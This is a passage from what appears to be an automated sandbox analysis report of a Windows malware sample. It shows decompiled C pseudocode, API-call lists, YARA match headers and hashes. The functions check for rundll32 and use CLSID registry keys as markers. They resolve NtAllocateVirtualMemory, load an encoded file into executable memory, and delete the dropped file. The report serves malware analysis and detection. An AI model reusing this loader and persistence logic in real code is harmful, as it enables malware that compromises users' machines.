                                                                                    0x04ec607f
                                                                                    0x04ec6086
                                                                                    0x04ec608d
                                                                                    0x04ec6094
                                                                                    0x04ec609b
                                                                                    0x04ec60a2
                                                                                    0x04ec60a9
                                                                                    0x04ec60b0
                                                                                    0x04ec60b7
                                                                                    0x04ec60be
                                                                                    0x04ec60c5
                                                                                    0x04ec60cf
                                                                                    0x04ec60d9
                                                                                    0x04ec60e3
                                                                                    0x04ec60ed
                                                                                    0x04ec60f7
                                                                                    0x04ec6101
                                                                                    0x04ec610b
                                                                                    0x04ec6115
                                                                                    0x04ec611f
                                                                                    0x04ec6129
                                                                                    0x04ec6133
                                                                                    0x04ec613d
                                                                                    0x04ec6144
                                                                                    0x04ec614b
                                                                                    0x04ec6152
                                                                                    0x04ec6159
                                                                                    0x04ec6160
                                                                                    0x04ec6167
                                                                                    0x04ec616e
                                                                                    0x04ec6175
                                                                                    0x04ec617c
                                                                                    0x04ec6183
                                                                                    0x04ec618a
                                                                                    0x04ec6192
                                                                                    0x04ec61b1
                                                                                    0x04ec61b9
                                                                                    0x04ec61df
                                                                                    0x04ec61f2
                                                                                    0x04ec61f5
                                                                                    0x04ec61fb
                                                                                    0x04ec61fd
                                                                                    0x04ec6208
                                                                                    0x04ec620f
                                                                                    0x04ec6213
                                                                                    0x04ec621a
                                                                                    0x04ec621e
                                                                                    0x04ec6225
                                                                                    0x04ec6229
                                                                                    0x04ec6230
                                                                                    0x04ec6234
                                                                                    0x04ec623c
                                                                                    0x04ec623c
                                                                                    0x04ec61fd
                                                                                    0x04ec6241
                                                                                    0x04ec6243
                                                                                    0x04ec6246
                                                                                    0x04ec6246
                                                                                    0x04ec6249
                                                                                    0x04ec624c
                                                                                    0x04ec6253
                                                                                    0x04ec6258
                                                                                    0x04ec625a
                                                                                    0x04ec6260
                                                                                    0x04ec6260
                                                                                    0x04ec6268
                                                                                    0x04ec6272
                                                                                    0x04ec6272
                                                                                    0x04ec627d
                                                                                    0x04ec6281
                                                                                    0x04ec6288
                                                                                    0x04ec628d
                                                                                    0x04ec6295
                                                                                    0x04ec62ac
                                                                                    0x04ec62b3
                                                                                    0x04ec62cd
                                                                                    0x04ec62e1
                                                                                    0x04ec62e1
                                                                                    0x04ec62b5
                                                                                    0x04ec62c3
                                                                                    0x04ec62c3
                                                                                    0x04ec6297
                                                                                    0x04ec62a5
                                                                                    0x04ec62a5
                                                                                    0x04ec6295
                                                                                    0x04ec62e6
                                                                                    0x04ec62e7
                                                                                    0x04ec62f6
                                                                                    0x04ec62fd
                                                                                    0x04ec6300
                                                                                    0x04ec6300
                                                                                    0x04ec6303
                                                                                    0x04ec6306
                                                                                    0x04ec630b
                                                                                    0x04ec6320

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                    • RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: -$-$-$0$2$2$2$3$6$6$6$6$6$7$C$F$F$G$J$M$R$R$S$S$W$\$\$c$d$e$f$i$i$o$p$p$r$r$r$s$u$y
                                                                                    • API String ID: 3677997916-1672344200
                                                                                    • Opcode ID: eae8f7316728f914e1e69dc1766f0c01b92c42bf41b2b88d0b4607c71b81fb25
                                                                                    • Instruction ID: fccfb116f62dd6f835410c3faacee6f9009c3fad60a3e18a15f77f3023223afe
                                                                                    • Opcode Fuzzy Hash: eae8f7316728f914e1e69dc1766f0c01b92c42bf41b2b88d0b4607c71b81fb25
                                                                                    • Instruction Fuzzy Hash: 7A816F70D0021DCADB25CFA4D9447EEBBB5FF45308F0091AED9496B201E7B95A89CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECBE90, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 152sleepfilestringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 92%
                                                                                    			E04ECBE90(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v208;
				short _v728;
				short _v1248;
				short _v1768;
				long _v1772;
				signed int _t19;
				int _t31;
				int _t34;
				void* _t37;
				signed int _t39;
				void* _t43;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t70;
				void* _t93;
				long _t94;
				void* _t96;
				void* _t97;
				void* _t98;
				signed int _t99;

				_t64 = __ecx;
				_t61 = __ebx;
				_t19 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t19 ^ _t99;
				_t96 = GetModuleFileNameW;
				_t93 = __ecx;
				GetModuleFileNameW(0,  &_v1248, 0x104);
				if(lstrcmpiW(E04EDD5EE( &_v1248, 0x5c) + 2, L"rundll32.exe") != 0) {
					GetModuleFileNameW(0,  &_v728, 0x104);
					_t31 = E04EDD5EE( &_v728, 0x2e) + 2;
					__eflags = _t31;
					if(_t31 != 0) {
						_t67 =  *L"dat"; // 0x610064
						 *_t31 = _t67;
						_t68 =  *0x4efe650; // 0x74
						 *((intOrPtr*)(_t31 + 4)) = _t68;
						_t34 = PathFileExistsW( &_v728);
						__eflags = _t34;
						if(_t34 != 0) {
							goto L5;
						}
					}
				} else {
					_push(_t64);
					_t58 = E04ECBD70(_t93,  &_v1768,  &_v728);
					_t106 = _t58;
					if(_t58 != 0) {
						MoveFileExW( &_v1768, 0, 4); // executed
						L5:
						E04EDDAD0(_t93,  &_v208, 0, 0xc8);
						_t37 = E04EC6F80(_t61,  &_v208, _t93, _t96, _t106); // executed
						_t97 = _t37;
						_t107 = _t97;
						if(_t97 <= 0) {
							_t70 =  *0x4f055f8; // 0x378, executed
							E04EC6C30(_t61, _t70, _t93, _t97, __eflags); // executed
						} else {
							E04EC6C30(_t61, _t97, _t93, _t97, _t107);
							E04EC6DB0( &_v208, _t97);
						}
						_t39 = E04EC5920(); // executed
						_v1772 = 0;
						asm("sbb eax, eax");
						_t43 = E04EC9740( &_v1772,  &_v728,  ~( ~_t39) + 1); // executed
						_t98 = _t43;
						if(_t98 != 0) {
							_t94 = _v1772;
							_t109 = _t94;
							if(_t94 != 0) {
								E04EC9680(_t61, _t98, _t94, _t94, _t98, _t109); // executed
								E04EC5500(_t98, _t94);
								_t46 = E04EC94A0(_t61, L"Control", _t94, _t98, _t109); // executed
								if(_t46 == 0x1fffffff || _t46 == 0x2fffffff) {
									E04EB78A0(_t61, L"Control", 0, _t94, _t98, 0);
								}
								_t48 = E04EC94A0(_t61, L"Dispatch", _t94, _t98, 0); // executed
								if(_t48 == 0x1fffffff || _t48 == 0x2fffffff) {
									E04EB78A0(_t61, L"Dispatch", 0, _t94, _t98, 0);
								}
								_t50 = E04ECB9A0(_t61, _t98, _t94, _t94, _t98); // executed
								if(_t50 <= 0) {
									_push(_t61);
									do {
										E04ECB800();
										Sleep(0x3e8);
									} while (E04ECB9A0(Sleep, _t98, _t94, _t94, _t98) <= 0);
								}
								VirtualFree(_t98, 0, 0x8000); // executed
								DeleteFileW( &_v728); // executed
							}
						}
					}
				}
				return E04ED572E(_v8 ^ _t99);
			}






























                                                                                    0x04ecbe90
                                                                                    0x04ecbe90
                                                                                    0x04ecbe99
                                                                                    0x04ecbea0
                                                                                    0x04ecbea4
                                                                                    0x04ecbeb9
                                                                                    0x04ecbebb
                                                                                    0x04ecbee5
                                                                                    0x04ecbf1c
                                                                                    0x04ecbf2f
                                                                                    0x04ecbf2f
                                                                                    0x04ecbf32
                                                                                    0x04ecbf38
                                                                                    0x04ecbf3e
                                                                                    0x04ecbf40
                                                                                    0x04ecbf46
                                                                                    0x04ecbf50
                                                                                    0x04ecbf56
                                                                                    0x04ecbf58
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecbf58
                                                                                    0x04ecbee7
                                                                                    0x04ecbee7
                                                                                    0x04ecbef1
                                                                                    0x04ecbef9
                                                                                    0x04ecbefb
                                                                                    0x04ecbf0c
                                                                                    0x04ecbf5e
                                                                                    0x04ecbf6c
                                                                                    0x04ecbf7a
                                                                                    0x04ecbf7f
                                                                                    0x04ecbf81
                                                                                    0x04ecbf83
                                                                                    0x04ecbf9b
                                                                                    0x04ecbfa1
                                                                                    0x04ecbf85
                                                                                    0x04ecbf87
                                                                                    0x04ecbf94
                                                                                    0x04ecbf94
                                                                                    0x04ecbfa6
                                                                                    0x04ecbfad
                                                                                    0x04ecbfbd
                                                                                    0x04ecbfc9
                                                                                    0x04ecbfce
                                                                                    0x04ecbfd5
                                                                                    0x04ecbfdb
                                                                                    0x04ecbfe1
                                                                                    0x04ecbfe3
                                                                                    0x04ecbfed
                                                                                    0x04ecbff6
                                                                                    0x04ecc000
                                                                                    0x04ecc00a
                                                                                    0x04ecc01a
                                                                                    0x04ecc01a
                                                                                    0x04ecc024
                                                                                    0x04ecc02e
                                                                                    0x04ecc03e
                                                                                    0x04ecc03e
                                                                                    0x04ecc047
                                                                                    0x04ecc04e
                                                                                    0x04ecc050
                                                                                    0x04ecc057
                                                                                    0x04ecc057
                                                                                    0x04ecc061
                                                                                    0x04ecc06c
                                                                                    0x04ecc070
                                                                                    0x04ecc079
                                                                                    0x04ecc086
                                                                                    0x04ecc086
                                                                                    0x04ecbfe3
                                                                                    0x04ecbfd5
                                                                                    0x04ecbefb
                                                                                    0x04ecc09b

                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000), ref: 04ECBEBB
                                                                                    • lstrcmpiW.KERNEL32(-00000002,rundll32.exe), ref: 04ECBED7
                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 04ECBF0C
                                                                                      • Part of subcall function 04EC6C30: wsprintfW.USER32 ref: 04EC6C78
                                                                                      • Part of subcall function 04EC6C30: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC6CB5
                                                                                      • Part of subcall function 04EC6C30: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6CE0
                                                                                      • Part of subcall function 04EC6C30: RegCloseKey.ADVAPI32(?), ref: 04EC6CF6
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04ECBF1C
                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 04ECBF50
                                                                                    • Sleep.KERNEL32(000003E8,?), ref: 04ECC061
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04ECC079
                                                                                    • DeleteFileW.KERNEL32(?), ref: 04ECC086
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$ModuleName$CloseDeleteExistsFreeMoveOpenPathQuerySleepValueVirtuallstrcmpiwsprintf
                                                                                    • String ID: Control$Dispatch$dat$rundll32.exe
                                                                                    • API String ID: 2408718126-2128312152
                                                                                    • Opcode ID: 9973d3c5247aab3edd5bc07c778df7a1efc32be28d4c3265719185b677ef2399
                                                                                    • Instruction ID: ea1f2c9bd60c37f3a1d7f02cf563554907264c6101d8e0b389c3f4b4d7315ded
                                                                                    • Opcode Fuzzy Hash: 9973d3c5247aab3edd5bc07c778df7a1efc32be28d4c3265719185b677ef2399
                                                                                    • Instruction Fuzzy Hash: 8C41D971E002189BFB24A734DE46FAE73699FC0218F14515DD909E72C0EE74FE468B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC6C30, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 106registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 94%
                                                                                    			E04EC6C30(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				char _v616;
				int _v620;
				int _v624;
				signed int _t28;
				long _t38;
				long _t41;
				char _t57;
				signed int _t71;

				_t28 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t28 ^ _t71;
				_t57 = __ecx;
				_v616 = 0;
				_v620 = 4;
				E04EC6010(__ecx, L"SEOID",  &_v88, __edi, __esi); // executed
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				E04EDDAD0(__edi,  &_v616, 0, _v620);
				_v612 = 0;
				_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612); // executed
				if(_t38 != 0) {
					L3:
					_v616 = _t57;
					_v620 = 4;
					_v612 = 0;
					_t41 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
					if(_t41 != 0) {
						L5:
						return E04ED572E(_v8 ^ _t71);
					} else {
						RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4); // executed
						_t69 =  ==  ? 1 : 0;
						RegCloseKey(_v612);
						__eflags =  ==  ? 1 : 0;
						if(( ==  ? 1 : 0) != 0) {
							goto L2;
						} else {
							goto L5;
						}
					}
				} else {
					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620);
					_t70 =  ==  ? 1 : 0;
					RegCloseKey(_v612);
					_t77 =  ==  ? 1 : 0;
					if(( ==  ? 1 : 0) == 0) {
						goto L3;
					} else {
						L2:
						return E04ED572E(_v8 ^ _t71);
					}
				}
			}















                                                                                    0x04ec6c39
                                                                                    0x04ec6c40
                                                                                    0x04ec6c44
                                                                                    0x04ec6c46
                                                                                    0x04ec6c54
                                                                                    0x04ec6c63
                                                                                    0x04ec6c78
                                                                                    0x04ec6c8e
                                                                                    0x04ec6c96
                                                                                    0x04ec6cb5
                                                                                    0x04ec6cbd
                                                                                    0x04ec6d16
                                                                                    0x04ec6d18
                                                                                    0x04ec6d25
                                                                                    0x04ec6d3f
                                                                                    0x04ec6d4b
                                                                                    0x04ec6d53
                                                                                    0x04ec6d90
                                                                                    0x04ec6da1
                                                                                    0x04ec6d55
                                                                                    0x04ec6d6c
                                                                                    0x04ec6d7f
                                                                                    0x04ec6d82
                                                                                    0x04ec6d88
                                                                                    0x04ec6d8a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec6d8a
                                                                                    0x04ec6cbf
                                                                                    0x04ec6ce0
                                                                                    0x04ec6cf3
                                                                                    0x04ec6cf6
                                                                                    0x04ec6cfc
                                                                                    0x04ec6cfe
                                                                                    0x00000000
                                                                                    0x04ec6d00
                                                                                    0x04ec6d00
                                                                                    0x04ec6d15
                                                                                    0x04ec6d15
                                                                                    0x04ec6cfe

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC6C78
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC6CB5
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6CE0
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC6CF6
                                                                                    • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EC6D4B
                                                                                    • RegSetValueExW.KERNEL32(?,04EFD09C,00000000,00000004,?,00000004), ref: 04EC6D6C
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC6D82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseValue$OpenQuery$Createwsprintf
                                                                                    • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 3707868688-3437544703
                                                                                    • Opcode ID: e97898d69f8aea7d4ae0494316592c10075f458ca3a312deb01f733e68ab7b8b
                                                                                    • Instruction ID: 44a9a8a4655b309d34b69c84579b05145f20cf9ac7ecc27749e4750ba27e39c5
                                                                                    • Opcode Fuzzy Hash: e97898d69f8aea7d4ae0494316592c10075f458ca3a312deb01f733e68ab7b8b
                                                                                    • Instruction Fuzzy Hash: 2131507190522CABDB209FA1ED49FEBBBBCEF44715F100199BE09E2104D636AE44DF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC94A0, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 91registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 92%
                                                                                    			E04EC94A0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v88;
				short _v608;
				char _v612;
				void* _v616;
				int _v620;
				int _v624;
				signed int _t25;
				long _t35;
				char _t44;
				void* _t49;
				signed int _t65;

				_t25 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t25 ^ _t65;
				E04EC6010(__ebx, __ecx,  &_v88, __edi, __esi); // executed
				_v612 = 0;
				_v620 = 4;
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				E04EDDAD0(__edi,  &_v612, 0, _v620);
				_v616 = 0;
				_t35 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v616); // executed
				if(_t35 != 0) {
					L6:
					goto L7;
				} else {
					RegQueryValueExW(_v616, "1", 0,  &_v624,  &_v612,  &_v620);
					_t64 =  ==  ? 1 : 0;
					RegCloseKey(_v616);
					_t72 =  ==  ? 1 : 0;
					if(( ==  ? 1 : 0) == 0) {
						goto L6;
					} else {
						_t44 = _v612 - 0x13c;
						_v612 = _t44;
						if(_t44 == 0x1fffffff || _t44 == 0x2fffffff) {
							L7:
							return E04ED572E(_v8 ^ _t65);
						} else {
							wsprintfW( &_v608, L"Global\\%s",  &_v88);
							_t49 = OpenEventW(0x1f0003, 0,  &_v608);
							if(_t49 == 0) {
								return E04ED572E(_v8 ^ _t65);
							} else {
								CloseHandle(_t49);
								goto L6;
							}
						}
					}
				}
			}















                                                                                    0x04ec94a9
                                                                                    0x04ec94b0
                                                                                    0x04ec94b7
                                                                                    0x04ec94bf
                                                                                    0x04ec94d0
                                                                                    0x04ec94e0
                                                                                    0x04ec94f6
                                                                                    0x04ec94fe
                                                                                    0x04ec951d
                                                                                    0x04ec9525
                                                                                    0x04ec95c3
                                                                                    0x00000000
                                                                                    0x04ec952b
                                                                                    0x04ec954c
                                                                                    0x04ec955f
                                                                                    0x04ec9562
                                                                                    0x04ec9568
                                                                                    0x04ec956a
                                                                                    0x00000000
                                                                                    0x04ec956c
                                                                                    0x04ec9572
                                                                                    0x04ec9577
                                                                                    0x04ec9582
                                                                                    0x04ec95ca
                                                                                    0x04ec95d7
                                                                                    0x04ec958b
                                                                                    0x04ec959b
                                                                                    0x04ec95b2
                                                                                    0x04ec95ba
                                                                                    0x04ec95e8
                                                                                    0x04ec95bc
                                                                                    0x04ec95bd
                                                                                    0x00000000
                                                                                    0x04ec95bd
                                                                                    0x04ec95ba
                                                                                    0x04ec9582
                                                                                    0x04ec956a

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC94E0
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC951D
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,?), ref: 04EC954C
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC9562
                                                                                    • wsprintfW.USER32 ref: 04EC959B
                                                                                    • OpenEventW.KERNEL32(001F0003,00000000,?), ref: 04EC95B2
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC95BD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen$QueryValuewsprintf$EventHandle
                                                                                    • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 1348839613-2346361075
                                                                                    • Opcode ID: e1557e6c69c037a939908562d5759c0ec88d104a72c77be1aad43a70955c46a7
                                                                                    • Instruction ID: 4adb66b663640727fb762e1895d2b0d4d6c89f115bc320f862bbd438627ed031
                                                                                    • Opcode Fuzzy Hash: e1557e6c69c037a939908562d5759c0ec88d104a72c77be1aad43a70955c46a7
                                                                                    • Instruction Fuzzy Hash: 913145B190521CABDB20DFA0DD49FEEB7BCEF44305F100699AD09E2144EA75AE45CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC8C20, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 112libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 52%
                                                                                    			E04EC8C20(intOrPtr __ecx, char __edx) {
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t13;
				intOrPtr _t22;
				char _t23;
				void* _t24;
				_Unknown_base(*)()* _t26;
				char _t28;
				intOrPtr _t31;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				void* _t35;

				_t28 = __edx;
				_t33 =  *0x4f06b34; // 0x7ffc
				_t23 = __edx;
				_t31 =  *0x4f06b30; // 0x8dcda280
				_v8 = __ecx;
				if(_t31 != 0 || _t33 != 0) {
					L7:
					_push(0);
					_push(0x40);
					_push(0);
					_push(0x3000);
					_v28 = _t23;
					asm("cdq");
					asm("xorps xmm0, xmm0");
					_push(_t28);
					_push( &_v28);
					_push(0);
					_push(0);
					asm("movlpd [ebp-0x10], xmm0");
					asm("cdq");
					_push(_t28);
					asm("cdq");
					_v24 = 0;
					_t24 = E04EC8170(_t31, _t33, 6, _v8, _t28,  &_v20);
					if(_t24 != 0 || _t28 != 0) {
						_t13 =  *0x4f06b48;
						if(_t13 == 0) {
							L12:
							_t32 = GetModuleHandleW(L"ntdll.dll");
							 *0x4f06b48 = GetProcAddress(_t32, "RtlNtStatusToDosError");
							_t26 = GetProcAddress(_t32, "RtlSetLastWin32Error");
							_t13 =  *0x4f06b48;
							 *0x4f06b28 = _t26;
						} else {
							_t26 =  *0x4f06b28;
							if(_t26 == 0) {
								goto L12;
							}
						}
						if(_t13 != 0 && _t26 != 0) {
							RtlRestoreLastWin32Error( *_t13(_t24));
						}
						goto L16;
					} else {
						return _v20;
					}
				} else {
					_t21 =  *0x4f06b40; // 0x8dc40000
					_t28 =  *0x4f06b44; // 0x7ffc
					if(_t21 == 0 && _t28 == 0) {
						 *0x4f06b40 = E04EC8350(__ecx);
						 *0x4f06b44 = _t28;
					}
					_t22 = E04EC8B50(_t23, "NtAllocateVirtualMemory", _t28, _t31, _t33, _t21, _t28); // executed
					_t31 = _t22;
					_t35 = _t35 + 8;
					 *0x4f06b30 = _t31;
					_t33 = _t28;
					 *0x4f06b34 = _t33;
					if(_t31 != 0 || _t33 != 0) {
						goto L7;
					} else {
						L16:
						return 0;
					}
				}
			}





















                                                                                    0x04ec8c20
                                                                                    0x04ec8c28
                                                                                    0x04ec8c2e
                                                                                    0x04ec8c31
                                                                                    0x04ec8c37
                                                                                    0x04ec8c3c
                                                                                    0x04ec8c90
                                                                                    0x04ec8c90
                                                                                    0x04ec8c92
                                                                                    0x04ec8c94
                                                                                    0x04ec8c96
                                                                                    0x04ec8c9e
                                                                                    0x04ec8ca1
                                                                                    0x04ec8ca2
                                                                                    0x04ec8ca5
                                                                                    0x04ec8ca6
                                                                                    0x04ec8ca7
                                                                                    0x04ec8ca9
                                                                                    0x04ec8cae
                                                                                    0x04ec8cb3
                                                                                    0x04ec8cb4
                                                                                    0x04ec8cb9
                                                                                    0x04ec8cc0
                                                                                    0x04ec8ccc
                                                                                    0x04ec8cd3
                                                                                    0x04ec8ce6
                                                                                    0x04ec8ced
                                                                                    0x04ec8cf9
                                                                                    0x04ec8d0a
                                                                                    0x04ec8d1a
                                                                                    0x04ec8d21
                                                                                    0x04ec8d23
                                                                                    0x04ec8d28
                                                                                    0x04ec8cef
                                                                                    0x04ec8cef
                                                                                    0x04ec8cf7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec8cf7
                                                                                    0x04ec8d30
                                                                                    0x04ec8d3a
                                                                                    0x04ec8d3a
                                                                                    0x00000000
                                                                                    0x04ec8cd9
                                                                                    0x04ec8ce5
                                                                                    0x04ec8ce5
                                                                                    0x04ec8c42
                                                                                    0x04ec8c42
                                                                                    0x04ec8c47
                                                                                    0x04ec8c4f
                                                                                    0x04ec8c5a
                                                                                    0x04ec8c5f
                                                                                    0x04ec8c5f
                                                                                    0x04ec8c6c
                                                                                    0x04ec8c71
                                                                                    0x04ec8c73
                                                                                    0x04ec8c76
                                                                                    0x04ec8c7c
                                                                                    0x04ec8c7e
                                                                                    0x04ec8c86
                                                                                    0x00000000
                                                                                    0x04ec8d42
                                                                                    0x04ec8d42
                                                                                    0x04ec8d4a
                                                                                    0x04ec8d4a
                                                                                    0x04ec8c86

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,?,?,74E057B0,00000000,04ECBC35), ref: 04EC8CFE
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04EC8D12
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04EC8D1F
                                                                                    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04EC8D3A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                                                    • String ID: NtAllocateVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                    • API String ID: 3496116238-3017390355
                                                                                    • Opcode ID: 674916fd6ae8b0ceaa64c58fedb98de93012b4a257a505df3ba2eaac55eb1d44
                                                                                    • Instruction ID: 8307d6b70b1fbfb1d4f4fa7cd6dbf8db180131622b25f99a4852c77375924651
                                                                                    • Opcode Fuzzy Hash: 674916fd6ae8b0ceaa64c58fedb98de93012b4a257a505df3ba2eaac55eb1d44
                                                                                    • Instruction Fuzzy Hash: 5E31ADF4B012195BE710EF5AAF40B7AB7AEFBC4719F14116DEE04E3200E774AC5586A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC9740, Relevance: 13.7, APIs: 9, Instructions: 152filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EC9740(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4) {
				void _v8;
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr* _v24;
				void* _t36;
				intOrPtr _t40;
				void* _t41;
				signed char _t46;
				int _t52;
				void _t53;
				long _t60;
				void* _t62;
				intOrPtr* _t67;
				WCHAR* _t68;
				long _t69;
				long _t71;
				void* _t76;

				_t68 = __edx;
				_t76 = 0;
				_v24 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(__ecx != 0) {
					 *__ecx = 0;
				}
				_t36 = CreateFileW(_t68, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_v16 = _t36;
				if(_t36 == 0xffffffff) {
					L32:
					return _t76;
				} else {
					_t60 = GetFileSize(_t36, 0);
					_v20 = _t76;
					if(_t60 < 1) {
						L31:
						FindCloseChangeNotification(_v16); // executed
						goto L32;
					} else {
						_t40 = _a4;
						if(_t40 != 1) {
							if(_t40 != 2) {
								_t71 = _t60;
								goto L15;
							} else {
								_t52 = ReadFile(_v16,  &_v8, 4,  &_v12, 0); // executed
								if(_t52 == 0) {
									goto L30;
								} else {
									_t53 = _v8;
									if(_t53 > _t60) {
										_t53 = _t53 - 0xc8372a;
										_v20 = 1;
										_v8 = _t53;
									}
									_t71 = _t60 - _t53 - 4;
									if(_t71 < 1) {
										goto L30;
									} else {
										_t62 = _v16;
										SetFilePointer(_t62, _t53 + 4, 0, 0); // executed
										goto L16;
									}
								}
							}
						} else {
							if(ReadFile(_v16,  &_v8, 4,  &_v12, 0) == 0) {
								L30:
								goto L31;
							} else {
								_t71 = _v8;
								if(_t71 > _t60) {
									_t71 = _t71 - 0xc8372a;
									_v20 = 1;
									_v8 = _t71;
								}
								L15:
								_t62 = _v16;
								L16:
								_t41 = VirtualAlloc(0, _t71, 0x1000, 0x40); // executed
								_t76 = _t41;
